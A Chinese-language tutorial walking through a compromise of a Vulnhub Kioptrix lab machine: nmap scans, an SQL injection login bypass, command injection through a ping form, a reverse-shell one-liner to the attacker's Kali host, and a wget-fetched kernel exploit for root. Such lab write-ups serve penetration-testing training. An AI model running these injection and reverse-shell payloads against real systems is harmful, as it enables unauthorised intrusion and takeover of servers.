有許多人對(duì)神秘的黑客一直感興趣,卻苦于網(wǎng)上資料繁雜,無(wú)法入門(mén),在學(xué)黑客之前,你要知道什么是黑客,黑客就是那些對(duì)計(jì)算機(jī)有著強(qiáng)烈探索欲的人,一個(gè)真正的黑客,必須要至少掌握一門(mén)編程技術(shù)和熟悉系統(tǒng)的操作命令。 下面我會(huì)實(shí)際演示一個(gè)黑客是如何通過(guò)一個(gè)普通的網(wǎng)站攻破服務(wù)器并獲取ROOT權(quán)限。
基礎(chǔ)環(huán)境準(zhǔn)備
1、安裝Vmware虛擬機(jī)(不建議使用真機(jī));
2、前往vulnhub下載測(cè)試鏡像,下載地址
https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
3、用Vmware安裝下載鏡像,安裝完成后啟動(dòng)服務(wù)器(這就是我們的目標(biāo)服務(wù)器了);
4、虛擬機(jī)安裝kali操作系統(tǒng),kali系統(tǒng)下載地址:
https://www.kali.org/downloads/(也可以選擇其它操作系統(tǒng),Kali關(guān)于滲透測(cè)試工具集成比較好);
以上基礎(chǔ)環(huán)境可谷歌、百度自行安裝,有問(wèn)題可以反饋留言。
備注:目標(biāo)服務(wù)器和Kali服務(wù)器網(wǎng)絡(luò)需要配置同一個(gè)網(wǎng)段,默認(rèn)選擇Vmware的橋接模式即可。
操作流程
一、Kali系統(tǒng)IP查看
基礎(chǔ)環(huán)境準(zhǔn)備完畢,這時(shí)候需要打開(kāi)我們的Kali服務(wù)器了,查看Kali服務(wù)器自身的IP,敲入ifconfig命令,查看到Kali系統(tǒng)自身IP地址為192.168.137.133。
二、掃描目標(biāo)服務(wù)器IP地址
nmap -sP 192.168.137.1/24
經(jīng)過(guò)nmap掃描后發(fā)現(xiàn),同網(wǎng)段有192.168.137.88 的IP,這個(gè)IP就是我們此行的目標(biāo)IP了。
三、掃描目標(biāo)服務(wù)器開(kāi)放端口
nmap -A -p 1-65535 192.168.137.88 -v5
掃描192.168.137.88這臺(tái)服務(wù)器上開(kāi)放的端口,發(fā)現(xiàn)目標(biāo)服務(wù)器開(kāi)放的端口比較多,其中有常見(jiàn)的3306和80端口,相信有一定經(jīng)驗(yàn)的運(yùn)維或者開(kāi)發(fā)人員都知道,這兩個(gè)端口代表MySQL服務(wù)和Http服務(wù),后面攻擊這臺(tái)服務(wù)器就會(huì)通過(guò)常見(jiàn)的80端口進(jìn)行操作
四、SQL注入操作
用瀏覽器訪(fǎng)問(wèn)http://192.168.137.88,發(fā)現(xiàn)是個(gè)登錄頁(yè)面,嘗試用SQL注入,可登錄到管理后臺(tái),此SQL注入原理是由于后臺(tái)服務(wù)對(duì)用戶(hù)輸入的參數(shù)沒(méi)有進(jìn)行校驗(yàn),直接進(jìn)行SQL拼接,導(dǎo)致出現(xiàn)該漏洞。
登錄后發(fā)現(xiàn)可看到管理員界面,這個(gè)界面是管理員用于查看機(jī)器是否能ping通的,測(cè)試輸入localhost,點(diǎn)擊submit,發(fā)現(xiàn)ping命令可以執(zhí)行,然后這時(shí)可以用&& 符號(hào)連接其他命令,發(fā)現(xiàn)都能正常執(zhí)行,這時(shí)想到我們可以利用反彈shell進(jìn)行操作。
五、反彈Shell操作
Kali機(jī)器執(zhí)行如下命令:
nc命令可以實(shí)現(xiàn)任意TCP/UDP端口的偵聽(tīng),這里nc是作為server以TCP或UDP方式偵聽(tīng)4444端口(備注也可以指定其它端口)
nc -v -l -p 4444
瀏覽器上填寫(xiě)如下命令:
此命令是實(shí)現(xiàn)反彈shell,sh -i 打開(kāi)一個(gè)交互的sh,/dev/tcp建立一個(gè)socket連接,>&將標(biāo)準(zhǔn)錯(cuò)誤輸出重定向到標(biāo)準(zhǔn)輸出中,0>&1將標(biāo)準(zhǔn)輸入重定向到標(biāo)準(zhǔn)輸出中。
localhost && sh -i >& /dev/tcp/192.168.137.133/4444 0>&1
這時(shí)候發(fā)現(xiàn)自己的Kali機(jī)器上已經(jīng)進(jìn)入shell操作界面,這時(shí)候的shell就已經(jīng)是目標(biāo)機(jī)器的shell了(偷偷的竊喜一波)
查看目前的用戶(hù)發(fā)現(xiàn)是Apache用戶(hù),權(quán)限較低,無(wú)法創(chuàng)建、操作、刪除文件,也沒(méi)有權(quán)限進(jìn)行sudo操作,如下圖所示
六、提升權(quán)限到ROOT
這時(shí)執(zhí)行 uname -a 命令,發(fā)現(xiàn)該系統(tǒng)用到的內(nèi)核是2.6.9版本,如下圖所示。
這時(shí)候就可以去谷歌搜索該內(nèi)核版本是否存在高危漏洞,或者使用searchsploit工具進(jìn)行搜索,幸運(yùn)的是,網(wǎng)上已經(jīng)有人針對(duì)該內(nèi)核版本做過(guò)提權(quán)漏洞的腳本,如下圖。
通過(guò)wget把該文件下載到服務(wù)器上,由于操作的終端是反彈shell的終端,rz命令不可用。如果文件較內(nèi)容較少,可以手動(dòng)編輯,這里我是直接本地用 Python -m SimpleHTTPServer起個(gè)簡(jiǎn)單的靜態(tài)文件服務(wù),然后在服務(wù)器用wget命令下載。
下載完成后用gcc命令編譯,然后執(zhí)行編譯后的文件,此時(shí)發(fā)現(xiàn)權(quán)限已經(jīng)由普通的apache用戶(hù)提權(quán)到root用戶(hù)了,到此大功告成了,可以徹底做自己想做的事情了。
